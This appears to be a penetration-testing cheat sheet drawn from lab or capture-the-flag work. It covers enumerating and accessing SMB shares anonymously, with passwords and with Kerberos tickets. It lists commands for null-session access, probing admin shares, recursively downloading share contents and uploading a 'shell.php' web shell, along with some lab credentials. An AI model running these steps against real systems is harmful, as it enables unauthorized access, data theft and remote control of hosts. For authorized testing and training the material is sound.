Enum SMB Shares

Check shares with password, NTLM, and tickets

With/Without password

# Check if you have any access
crackmapexec smb $RHOST
crackmapexec smb $RHOST --shares
crackmapexec smb $RHOST -u '' -p '' 
crackmapexec smb $RHOST -u '' -p '' --shares
crackmapexec smb $RHOST -u 'anyuser' -p '' --shares

# List share
smbmap -H $RHOST -P 445 2>&1
smbmap -u null -p "" -H $RHOST -P 445 2>&1
smbclient -L //$RHOST 
smbclient -N -L //$RHOST 
smbclient -L \\\\$RHOST
smbclient -N -L \\\\$RHOST

# No password and login 
smbclient //$RHOST/apps
smbclient -N //$RHOST/apps
smbclient \\\\$RHOST\\apps
smbclient -N \\\\$RHOST\\apps

smbclient -N \\\\$RHOST\\profiles$  
smbclient -N \\\\$RHOST\\profiles\$   # Fish shell   

# When password available 
smbclient \\\\$RHOST\\forensic -U audit2020 
smbclient //$RHOST/apps -U baby2/library      # Prompt Password   
smbclient \\\\$RHOST\\apps -U baby2/library   # Prompt Password

# Try these directories when listed - logon scripts, GPO  
# Common share names for windows targets are
# C$
# D$
# ADMIN$
# IPC$
# PRINT$
# FAX$
# SYSVOL
# NETLOGON

smbclient \\\\$RHOST\\ADMIN$ # -U baby2/library if password available 
smbclient \\\\$RHOST\\IPC$ 
smbclient \\\\$RHOST\\NETLOGON  
smbclient \\\\$RHOST\\SYSVOL  

# Impacket-smbclient 
impacket-smbclient craft2/thecybergeek:winniethepooh@192.168.218.188
shares
use WebApp
put shell.php

# get all files 
smbget -R smb://$RHOST/share/

# Recursive via oneliner
smbclient  '\\\\$RHOST\\forensic' -U audit2020 -c 'mask "";prompt OFF;recurse ON; mget *'

# Recursive via manual command 
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

# Another recursive
smbget -U r.thompson -R smb://$RHOST/data/IT

With Kerberos tickets

impacket-getTGT 'absolute.htb/svc_smb:AbsoluteSMBService123!' -dc-ip $RHOST
export KRB5CCNAME=svc_smb.ccache
impacket-smbclient -k -no-pass -dc-ip dc.absolute.htb 'dc.absolute.htb'